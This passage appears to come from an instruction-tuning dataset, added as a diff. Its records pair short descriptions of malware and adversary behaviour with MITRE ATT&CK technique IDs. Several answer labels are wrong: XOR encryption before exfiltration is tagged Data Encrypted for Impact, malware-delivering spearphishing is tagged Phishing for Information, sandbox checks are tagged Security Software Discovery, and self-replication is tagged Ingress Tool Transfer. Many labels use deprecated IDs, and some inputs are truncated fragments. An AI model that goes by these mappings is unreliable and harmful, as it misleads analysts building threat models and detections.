globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "lower disable security settings by changing Registry keys.", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "lured victims to double-click on images in the attachments they sent which would then execute the hidden LNK file.", + "output": "- T1204: User Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "maintains access to victim environments by using to access as well as establishing a backup RDP tunnel by using .", + "output": "- T1108: Redundant Access" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "makes modifications to open-source scripts from GitHub and executes them on the victim\u2019s machine.", + "output": "- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "malware attempts to connect to Windows shares for lateral movement by using a generated list of usernames, which center around permutations of the username Administrator, and weak passwords.", + "output": "- T1110: Brute Force" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "malware can create a .lnk file and add a Registry Run key to establish persistence.", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "malware gathers passwords from multiple sources, including Windows Credential Vault, Internet Explorer, Firefox, Chrome, and Outlook.", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "malware has communicated with C2 servers over port 6667 (for IRC) and port 8080.", + "output": "- T1043: Commonly Used Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server. malware RomeoDelta archives specified directories in .zip format, encrypts the .zip file, and uploads it to its C2 server.", + "output": "- T1560: Archive Collected Data" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "malware IndiaIndia saves information gathered about the victim to a file that is compressed with Zlib, encrypted, and uploaded to a C2 server. malware RomeoDelta archives specified directories in .zip format, encrypts the .zip file, and uploads it to its C2 server. A malware sample encrypts data using a simple byte based XOR operation prior to exfiltration.", + "output": "- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims.", + "output": "- T1048: Exfiltration Over Alternative Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "malware uses cmd.exe to execute commands on victims.", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "malware uses PowerShell and WMI to script data collection and command execution on the victim.", + "output": "- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "malware WhiskeyDelta-Two contains a function that attempts to rename the administrator\u2019s account.", + "output": "- T1098: Account Manipulation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "may be used to exfiltrate data separate from the main command and control protocol.", + "output": "- T1048: Exfiltration Over Alternative Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "may have used the malware to move onto air-gapped networks. targets removable drives to spread to other systems by modifying the drive to use Autorun to execute or by hiding legitimate document files and copying an executable to the folder with the same name as the legitimate document.", + "output": "- T1091: Replication Through Removable Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"may use net group \"\"domain admins\"\" /domain to display accounts in the \"\"domain admins\"\" permissions group and net localgroup \"\"administrators\"\" to list local system administrator group membership.\"", + "output": "- T1087: Account Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Modules can be pushed to and executed by that copy data to a staging area, compress it, and XOR encrypt it.", + "output": "- T1560: Archive Collected Data\n- T1074: Data Staged\n- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "monitors browsing activity and automatically captures screenshots if a victim browses to a URL matching one of a list of strings.", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "a predefined directory.\"", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Newer variants of will encode C2 communications with a custom system.", + "output": "- T1001: Data Obfuscation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"New services created by are made to appear like legitimate Windows services, with names such as \"\"Windows Management Help Service\"\", \"\"Microsoft Support\"\", and \"\"Windows Advanced Task Manager\"\".\"", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "obtains and saves information about victim network interfaces and addresses.", + "output": "- T1049: System Network Connections Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "One version of consists of VBScript and PowerShell scripts. The malware also uses batch scripting.", + "output": "- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "opens a backdoor on TCP ports 6868 and 7777.", + "output": "- T1571: Non-Standard Port" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "opens the Windows Firewall to modify incoming connections.", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "performs BIOS modification and can download and execute a file as well as protect itself from removal.", + "output": "- T1542.001: Pre-OS Boot - System Firmware" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "performs most of its operations using Windows Script Host (Jscript and VBScript) and runs arbitrary shellcode .", + "output": "- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "performs several anti-VM and sandbox checks on the victim's machine.", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "persists via a login item.", + "output": "- T1547.015: Boot or Logon Autostart Execution - Login Items" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "probes the system to check for sandbox/virtualized environments and other antimalware processes.", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "puts a space after a false .jpg extension so that execution actually goes through the Terminal.app program.", + "output": "- T1036.006: Masquerading - Space after Filename" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ran a command to compile an archive of file types of interest from the victim user's directories.", + "output": "- T1005: Data from Local System\n- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RAT is able to wipe event logs.", + "output": "- T1070: Indicator Removal" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "registers itself as a service by adding several Registry keys.", + "output": "- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "registers itself as a service on the victim\u2019s machine to run as a standalone process.", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "renames one of its .dll files to uxtheme.dll in an apparent attempt to masquerade as a legitimate file.", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "scans processes on all victim systems in the environment and uses automated scripts to pull back the results.", + "output": "- T1119: Automated Collection\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "scans the C-class subnet of the IPs on the victim's interfaces.", + "output": "- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "searches for files named logins.json to parse for credentials and also looks for credentials stored from browsers.", + "output": "- T1552.001: Unsecured Credentials - Credentials In Files" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "searches for files on local drives based on a predefined list of file extensions.", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "searches for network drives and removable media and duplicates itself onto them.", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "searches recursively for Outlook personal storage tables (PST) files within user directories and sends them back to the C2 server.", + "output": "- T1114: Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "searches through Outlook files and directories (e.g., inbox, sent, templates, drafts, archives, etc.).", + "output": "- T1114: Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "sent malicious attachments to victims over email, including an Excel spreadsheet containing macros to download Pupy.", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "sent shortened URL links over email to victims. The URLs linked to Word documents with malicious macros that execute PowerShells scripts to download Pupy.", + "output": "- T1598.003: Phishing for Information - Spearphishing Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "service-based DLL implant can execute a downloaded file with parameters specified using CreateProcessAsUser.", + "output": "- T1546.009: Event Triggered Execution - AppCert DLLs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Several malware families encrypt C2 traffic using custom code that uses XOR with an ADD operation and XOR with a SUB operation. Another malware sample XORs C2 traffic. malware also uses a unique form of communication encryption known as FakeTLS that mimics TLS but uses a different encryption method, evading SSL man-in-the-middle decryption attacks.", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Some malware uses multiple channels for C2, such as RomeoWhiskey-Two, which consists of a RAT channel that parses data in datagram form and a Proxy channel that forms virtual point-to-point sessions.", + "output": "- T1026: Multiband Communication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Some samples contain a publicly available Web browser password recovery tool.", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Some samples have a module to extract email from Microsoft Exchange servers using compromised credentials.", + "output": "- T1078: Valid Accounts\n- T1114: Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Some samples use AES to encrypt C2 traffic.", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of 